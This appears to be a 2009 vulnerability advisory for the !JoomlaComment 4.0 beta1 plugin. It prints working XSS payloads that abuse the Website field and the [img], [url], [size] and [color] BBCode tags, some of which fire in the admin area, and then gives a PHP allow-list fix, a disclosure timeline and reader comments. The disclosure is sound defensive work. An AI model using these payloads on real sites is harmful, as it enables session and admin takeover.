Thursday, 17 September 2009 00:00
!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.
Website Input XSS
The 'Website' input field is checked for HTML markup, but fails to sanitize extra parameters.
' onmouseover='alert(String.fromCharCode(88,83,83))
' style='color:expression(alert(String.fromCharCode(88,83,83)))
[img] BBCode Tag XSS
[img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
[url] BBCode Tag XSS
[url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
[size] BBCode Tag XSS
[size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
This XSS vulnerability executes in the administrator area as well.
[color] BBCode Tag XSS
[color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
This XSS vulnerability executes in the administrator area as well.
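Every vector above works because a user-supplied value is copied into a quoted HTML attribute or an inline style without being checked against an allow-list. The following added example (not !JoomlaComment's code or its actual fix; all function names are hypothetical) sketches a renderer that validates each attribute value before emitting markup and leaves rejected tags as escaped text:

```php
<?php
// Added example; function names are hypothetical, not !JoomlaComment code.
// Absolute http(s) URL with no quotes, whitespace, angle or square brackets.
function safe_url(string $raw): ?string
{
    $url = trim($raw);
    if (!preg_match('#\Ahttps?://[^\s"\'<>\[\]]+\z#i', $url)) {
        return null;
    }
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

// [size=...] keywords map to fixed CSS values; nothing is copied through.
function safe_size(string $raw): ?string
{
    $sizes = ['small' => '0.85em', 'medium' => '1em', 'large' => '1.5em'];
    return $sizes[strtolower(trim($raw))] ?? null;
}

// A plain colour name or #rgb / #rrggbb, so ';', ':' and '(' never pass.
function safe_color(string $raw): ?string
{
    $c = trim($raw);
    return preg_match('/\A(?:[a-z]{3,20}|#[0-9a-f]{3}|#[0-9a-f]{6})\z/i', $c) ? $c : null;
}

function render_bbcode(string $text): string
{
    // Escape first: tags that are unknown or fail validation stay inert text.
    $html = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    $rules = [
        '#\[img\](.*?)\[/img\]#is' => ['safe_url', '<img src="%s" alt="">'],
        '#\[url=(.*?)\](.*?)\[/url\]#is' => ['safe_url', '<a href="%s" rel="nofollow">%s</a>'],
        '#\[size=(.*?)\](.*?)\[/size\]#is' => ['safe_size', '<span style="font-size:%s">%s</span>'],
        '#\[color=(.*?)\](.*?)\[/color\]#is' => ['safe_color', '<span style="color:%s">%s</span>'],
    ];
    foreach ($rules as $pattern => [$check, $format]) {
        $html = preg_replace_callback($pattern, function (array $m) use ($check, $format) {
            // Validate the raw (un-escaped) attribute value, never the escaped one.
            $value = $check(htmlspecialchars_decode($m[1], ENT_QUOTES));
            return $value === null ? $m[0] : sprintf($format, $value, $m[2] ?? '');
        }, $html);
    }
    return $html;
}

// Constructed input reusing the [size] vector from this advisory.
echo render_bbcode('[size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]'), "\n";
echo render_bbcode('[size=large]ok[/size] [url=http://example.com/?a=1&b=2]link[/url]'), "\n";
```

Square brackets are excluded from URLs so that a later rule cannot rewrite BBCode nested inside an already emitted attribute. The same safe_url() check applies to the 'Website' field before it is written into an href.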
Timeline
- Vulnerabilities Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vendor Response: ... 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:36
Comments (3)
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.




Thanks for posting this. I discovered it via the Vulnerable Extensions List. I noticed that this is for version 4.0 Beta version 1. I'm currently using Version 4.0 Beta Version 2. Any idea if the problem has been corrected in the current build?
Sorry I can't be more helpful than that!